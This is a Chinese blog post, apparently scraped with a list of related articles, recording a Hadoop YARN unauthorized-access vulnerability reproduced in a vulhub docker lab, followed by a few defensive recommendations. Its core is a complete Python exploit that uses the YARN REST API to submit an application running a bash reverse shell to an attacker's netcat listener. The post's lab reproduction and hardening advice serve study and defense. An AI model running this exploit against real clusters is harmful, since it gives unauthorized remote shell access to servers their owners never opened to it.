漏洞简介以及危害

Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器器直接在开放了了
Hadoop 机器器 HDFS 的 50070 web 端口及部分默认服务口口,黑客可以通过命令行操作多个目录下
的数据,如进行删除,下载,目录浏览甚至命令行行等操作,产生极大的危害。

环境

vulnhub

测试

启动环境

docker-compose up -d

访问

http://192.168.0.100:8088/cluster

通过REST API命令执行

利用过程:
在本地监听端口 > 创建Application > 调用Submit Application API提交
1.本机监听

nc -lvvp 8888

2.直接本机执行EXP:python exp.py

import requests target = 'http://192.168.0.100:8088/'
lhost = '192.168.0.105' # put your local host ip here, and listen at port 8888
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = { 'application-id': app_id, 'application-name': 'get-shell','am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/8888 0>&1' % lhost, }, }, 'application-type': 'YARN',
}
requests.post(url, json=data)

3.反弹shell成功

防御手段

  • 如无必要, 关闭 Hadoop Web 管理⻚面。
  • 开启身份验证 ,防止未经授权用户访问。
  • 设置“安全组”访问控制策略,将 Hadoop 默认开放的多个端口对公网全部禁止或限制可信任的 IP 地址才能访包括 50070 以及 WebUI 等相关端口。

Hadoop未授权访问漏洞记录(影响版本:全版本,端口号:50070)相关推荐

  1. MongoDB未授权访问漏洞记录(端口:27017,37017)

    一.漏洞危害 对外开放的MongoDB服务,未配置访问认证授权,无需认证连接数据库后对数据库进行任意操作(增.删.改.查高危动作),存在严重的数据泄露风险. 二.漏洞成因 MongoDB服务安装后,默 ...

  2. Redis未授权访问漏洞记录(端口:6379)

    目录 Redis 扫描 未授权登录以及利用 写入SSH公钥,进行远程登录 定时任务反弹shell 写入一句话木马 其它一句话木马 ​ 写入/etc/passwd文件 利用主从复制RCE ​ 本地Red ...

  3. Jboss未授权访问漏洞记录(影响版本:全版本,端口:80,8080)

    一.前言 漏洞原因:在低版本中,默认可以访问Jboss web控制台(http://127.0.0.1:8080/jmx-console),无需用户名和密码. 二.环境配置 使用docker搭建环境 ...

  4. Rsync未授权访问漏洞记录(影响范围:全版本,端口:873)

    1. 漏洞介绍及危害 Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录.Rsync 默认允许匿 ...

  5. CouchDB未授权访问漏洞记录(端口:5984、6984,CVE-2017-12635,CVE-2017-12636)复现失败

    复现exp失败 漏洞简介以及危害 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript ...

  6. jenkins未授权访问漏洞记录(端口:7001,80,8080,50000)

    一.漏洞描述 未授权访问管理控制台,可以通过脚本命令行执行系统命令.通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件. 二.漏洞环境搭建 ...

  7. Alibaba Druid未授权访问漏洞记录(敏感目录,端口:不确定)

    Druid简介 1.Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池. 2.Druid提供的监控功能,监控SQL的执行时间.监控Web URI的请求.Session监控. Druid可能 ...

  8. Memcached未授权访问漏洞记录(CVE-2013-7239、危害级别全版本、端口:11211)

    Memcached介绍 Memcached是一个自由开源的,高性能,分布式内存对象缓存系统. Memcached是以LiveJournal旗下Danga Interactive公司的Brad Fitz ...

  9. ZooKeeper未授权访问漏洞记录(影响范围:全版本,端口:2181)

    漏洞简介 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件.它是一个为分布式应用提供一致性服务的软件 ...

最新文章

  1. 设计模式之状态模块加观察者模式
  2. 《扩展 jQuery》——6.3 总结
  3. 关于监控拾音器测试对比的一些小建议
  4. mysql 插入汉字 异常 Incorrect string value: '\xE8\xA7\x84\xE5\x88\x99' for column 'name'
  5. Windows下编译TensorFlow1.3 C++ library及创建一个简单的TensorFlow C++程序
  6. vim C plugins
  7. Eclipse Spring Boot实现热部署
  8. SQLite学习手册(在线备份)
  9. jQuery里的promise
  10. 此 sqltransaction 已完成;它再也无法使用_手把手教你如何修眉毛,学会再也不用花钱去美容院了...
  11. Linux redhat ICE环境安装
  12. iOS:位置相关(18-03-09更)
  13. 过拟合和欠拟合_现代深度学习解决方案中的两大挑战:拟合和欠拟合
  14. mysql索引学习笔记
  15. FPGA加法器时分复用减少逻辑资源
  16. PHP学习之会话控制session、cookie
  17. 思博伦安全专家预测2017年民用和军用全球导航应用面临的更大风险
  18. idea java 快捷键_图示Javahtml5开发中IDEA的一些常用默认快捷键
  19. 修改服务器编码和oracle编码,修改oracle 数据服务器编码
  20. UTF-8,Unicode,GBK,希腊字母读法,ASCII码表,HTTP错误码,URL编码表,HTML特殊字符,汉字编码简明对照表...

热门文章

  1. 海南大学植物代谢组学技术开发与创新应用课题组博士后招聘
  2. Nat Biotechnol | 大神李恒团队开发不依赖于亲本的单倍型基因组组装工具hifiasm
  3. Adobe illustrator 介绍几个快捷键 - 连载 8
  4. KMP字符串比对算法理解
  5. 1.5 编程基础之循环控制 36 计算多项式的值 python
  6. 1.4编程基础之逻辑表达式与条件分支 12 骑车与走路
  7. 第37课 神奇的大自然 《小学生C++趣味编程》
  8. vue设置输入框输入长度_vue输入框限制字符串长度和输入内容实时验证的实现方式...
  9. 数字系统设计学习之出租车计价器设计
  10. linux ls命令shell脚本位置,linux - shell脚本到ls并在ls上执行命令结果 - SO中文参考 - www.soinside.com...